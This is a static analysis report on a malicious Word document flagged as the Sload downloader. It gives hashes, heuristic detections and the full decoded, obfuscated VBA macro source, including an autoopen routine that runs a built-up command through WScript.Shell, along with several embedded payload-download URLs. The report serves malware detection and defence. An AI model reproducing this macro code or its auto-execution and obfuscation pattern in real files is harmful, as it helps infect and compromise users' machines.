Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 45ac17ddf4d729ec…

MALICIOUS

Office (OLE)

146.1 KB Created: 2019-01-15 12:26:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 4d973d58d3fcfb490db08c7d6ca11ecf SHA-1: e63de403a15b34440ba9bb38aa222406610743d4 SHA-256: 45ac17ddf4d729ecbb6434517411dc722db4ec2e7eb7f00c6c8f65de07705e27
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an autoopen function that utilizes WScript.Shell and CreateObject to execute commands. The macros appear to be designed to download and execute a second-stage payload from the concatenated URL found in the embedded artifacts. The ClamAV detection and heuristic firings strongly indicate malicious downloader functionality.

Heuristics 9

  • ClamAV: Doc.Downloader.Sload-6815984-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6815984-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
     Set hapticzw = SCSIwq
turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
   Set Senioraj = calculatingwk
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set hapticzw = SCSIwq
turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
   Set Senioraj = calculatingwk
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "HomeAutomotiveJewelerylw"
Sub autoopen()
Berkshirepk = Array(compressingqp, circuitpf, Cambridgeshireiv, mobileka, Marketingjj, integratedhj, Futurear)
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ddd.nkalitin.ru/3ghp_#E]B]_77azuhjhttp://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhjhttp://ddd.li8stroy.ru/a8f8l_tnv#5CChjhttp://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26 In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5954 bytes
SHA-256: 7ab8b047479dc40419707c785183961edbbd672f529cb75f997e4839f1fdc52d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lavenderto"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "CheckingAccounttc"
Function mobileka()
On Error Resume Next
   Set Avonct = backingupnc
For Each Awesomeis In NewTaiwanDollarjt
      For Each paymenthc In redefineuw
         Coveszp = (Oct(370))
      Next
      Do
         NewJerseytq = CLng(zeroadministrationfw)
      Loop Until valueaddedmw Eqv Bordersum
      Set Handcraftedhj = Steelii
      strategichr = bandwidthtv
      For Each Pennsylvaniacs In generatinguz
         overridingwh = Cos(evenkeeledcw)
      Next
   Next
 Set compresssm = bypassingnz
   Set inputmh = Pennsylvaniaiz
For Each Configurationzs In cultivatezb
      For Each Bordersoo In Assurancesh
         IraqiDinarjv = (Oct(172))
      Next
      Do
         IncredibleSoftShoeshj = CLng(hapticwh)
      Loop Until Producersn Eqv violetsh
      Set depositcj = Ridgeshw
      Opensourceqq = monetizess
      For Each IntelligentFreshTablejk In middlewarefj
         groupwareqw = Cos(CreditCardAccountln)
      Next
   Next
 Set GraphicInterfacear = driverjk
   Set bandwidthiq = CFPFrancwj
For Each GenericMetalHatif In Bordersrr
      For Each Officerzw In FantasticFrozenPantsrh
         Squareskb = (Oct(316))
      Next
      Do
         PhilippinePesolh = CLng(backendqz)
      Loop Until Mainekh Eqv Dividedn
      Set bluetoothwt = Tunnelkc
      Corporatekz = Nebraskani
      For Each Representativeoj In Nationalmi
         Configurablevj = Cos(generatemu)
      Next
   Next
 Set hapticzw = SCSIwq
turquoisewc = Array(generatejw, Groupzj, RefinedConcreteChipsfp, CreateObject("WscRipt.sHeLl").Run!(("" + Corporatefr + SCSIkr + Senioraz + Leaddw + lavenderto.TextBox1) + GenericWoodenPizzawj + Awesomeim + Operativebn + empoweringiw, 80 - 80), supportrz, yellowrl, maroonil)
   Set Senioraj = calculatingwk
For Each monitorsu In Representativeui
      For Each verticalww In Assistantiu
         navigatingpz = (Oct(189))
      Next
      Do
         virtualco = CLng(UAEDirhamww)
      Loop Until Producerqw Eqv Cottontw
      Set cyanrw = Massachusettsda
      Programtm = Leonewc
      For Each SouthAfricatf In backingupmn
         foregroundoh = Cos(InvestmentAccountbr)
      Next
   Next
 Set HandmadeSoftBallon = Avonoi
   Set capacitoriq = benchmarkmh
For Each Shoreif In Industrialmk
      For Each InvestmentAccountsc In Cottonvt
         Rusticrw = (Oct(897))
      Next
      Do
         connectingjr = CLng(reciprocalwi)
      Loop Until solidstateki Eqv Millkj
      Set contingencyhh = customizedqh
      knowledgeuserpf = Programmablehc
      For Each Buckinghamshirenj In transformhm
         accesspw = Cos(turquoisedv)
      Next
   Next
 Set Cornersci = ADPab
End Function


Attribute VB_Name = "HomeAutomotiveJewelerylw"
Sub autoopen()
Berkshirepk = Array(compressingqp, circuitpf, Cambridgeshireiv, mobileka, Marketingjj, integratedhj, Futurear)
End Sub

Attribute VB_Name = "Missionwa"

Attribute VB_Name = "TastySoftComputerwz"

Attribute VB_Name = "modelscz"

Attribute VB_Name = "systematictw"

Attribute VB_Name = "valueaddedjc"

Attribute VB_Name = "XSSij"

Attribute VB_Name = "Refinedik"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CheckingAccountnr"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "GorgeousConcretePantszj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "paymentpj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Woodenmz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hapticvw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "withdrawalvl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "mobilepa"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.